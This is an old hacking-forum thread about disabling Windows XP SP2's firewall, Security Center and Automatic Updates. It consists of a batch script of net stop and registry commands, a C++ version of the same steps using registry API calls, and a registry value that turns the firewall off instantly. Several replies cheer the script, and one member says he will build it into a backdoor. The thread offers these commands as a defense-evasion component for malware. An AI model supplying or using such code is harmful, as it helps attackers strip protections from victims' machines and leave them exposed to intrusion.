[x1`]

@echo off
net stop "Security Center"
net stop SharedAccess
reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /t REG_DWORD /d 0x4 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /v Start /t REG_DWORD /d 0x4 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /t REG_DWORD /d 0x4 /f

[ssj4conejo]

nice... = ) who would have thought disabling the xp firewall be that simple. Nice work

[M4Z3R]

Uhm, taht's very nice dude, I'll put that in my next BackDoor for Sp2 :P

[MaNiAx]

extremely interesting..just proves how much SP2 failed at everything it did :D

[mathofaka]

GOoD wOrK Im TrYiNg It :D

[PiP]

1) its not "code" its commands, to be run on command line or from bat file...

2) Is it just me...or has this same info been posted about 5 times before?

3)

Quote

Uhm, taht's very nice dude, I'll put that in my next BackDoor for Sp2

ahh DUDE, unless your "backdoor" is a bat file, or is going to use system() (and even then it would be more smart to use API to achieve the same effect...) then, what (filtered) programming language are you using? cos i want it!

4) I'm going to sleep.

[Figo]

yo, listen up pimp, if ur suchs a smartass you code it yourself

dumb ass 1337 d00d :lol:

[PiP]

...ok man....ahh....

Quote

yo, listen up pimp, if ur suchs a smartass you code it yourself

dumb ass 1337 d00d�

FFS its NOT code (or even a file for that matter)....it is a bunch of commands! (obviously from a bat file "@echo off" anyone?) There isnt anything too technical about using API to modify the reg. or send a system comamnd to stop a service....

The fact that people make stupid comments like "thanx" and "i will use this in my next..." is not only STUPID (because obviously they have no understanding of what they are even commenting on) but a waste of time to read through it all....thats the point im trying to make here.

[nuorder]

nice codez i will looks @ dis
10x

[PiP]

Here man, i decided to take you up on that 'challenge' and here is code - with slight modification (un-tested) - will work.

Include "winreg.h" & "windows.h" and here is modifying the services start state...

//untested.... uni PC's dont like winreg.h file...for some reason...
void main()
{
//reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /t REG_DWORD /d 0x4 /f
//reg add "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /v Start /t REG_DWORD /d 0x4 /f
//reg add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /t REG_DWORD /d 0x4 /f 
HKEY software;
HKEY mykey;

int bob =0x4;
unsigned long size = sizeof(bob);

system("net stop \"Security Center\"");
system("net stop SharedAccess");

//if key already exists it will just open and not create so its alll goood
RegCreateKey(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SharedAccess",&software);
RegCreateKey(software,"Start",&mykey);

//if dosn't already exists (it does, we created it) it will create then modify so its all good
RegSetValueEx(mykey,"Start",NULL,REG_DWORD,(LPBYTE)bob,size);
RegCloseKey(mykey);
RegCloseKey(software);

RegCreateKey(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\wuauserv",&software);
RegCreateKey(software,"Start",&mykey);
RegSetValueEx(mykey,"Start",NULL,REG_DWORD,(LPBYTE)bob,size);
RegCloseKey(mykey);
RegCloseKey(software);

RegCreateKey(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\wscsvc",&software);
RegCreateKey(software,"Start",&mykey);
RegSetValueEx(mykey,"Start",NULL,REG_DWORD,(LPBYTE)bob,size);
RegCloseKey(mykey);
RegCloseKey(software);
}

Anyone wants to learn more i used API viewer (comes with Visual Studio 6) to find the correct API name (API viewer lists all "declares" to use with Visual basic) then did a google search to find out what header file you need to include in c++ to use the API, and then this page to read about the API's functions - http://www.windowsit...tent/595/1.html

In clossing, Google is your friend!

[PiP]

Ok now im on a PC that works, here is revised & tested (to an extent...i dont have SP2 installed heh) c++ code (3 functions) to disable SP2's firewall and other services that the above cmd line commands do.

void sp2Fuck() - does not cout anything just goes through and trys to disable & stop services

void sp2FuckDebug() - outputs to cout at each step, telling you if it succedded or failed and possibly why.

Both functions DISABLE & STOP these services:
- Automatic Updates
- Security Center
- Conection Firewall

Not only that, but the code could serve as a good learning resource for anyone interested in manipulating windows services.

void disableServicesUsingRegAccess() - Does the same, but with system() and registry function/api calls.

Attached File(s)

•  reg.cpp (7.22K)
  Number of downloads: 41

[bjoernfun]

@pip

many thanks for your work! for me it is a good example how to "talk" to the registry over c++ !

[nuorder]

if ur lazy and want the firewall to go away
just add the dword EnableFirewall (value = 0) to
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile

and the firewall will instantly be disabled

[PiP]

Not to mention the API ms provide to change all the firewalls settings haha

http://msdn.microsof...l_functions.asp

Someone remind me of the use of windows firewall again?